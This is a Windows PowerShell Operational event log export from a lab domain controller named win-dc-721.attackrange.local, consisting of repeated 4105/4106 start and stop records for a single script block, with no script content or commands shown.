Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474128
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474127
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474126
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474125
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474124
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474123
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474122
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474121
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474120
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474119
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474118
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474117
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474116
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474115
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474114
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474113
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474112
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474111
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474110
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474109
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474108
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474107
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474106
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474105
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474104
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474103
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474102
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474101
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474100
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474099
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474098
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474097
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474096
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474095
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474094
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474093
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474092
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474091
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474090
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474089
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474088
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474087
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474086
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474085
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474084
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474083
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474082
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474081
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474080
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474079
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474078
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474077
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474076
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474075
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
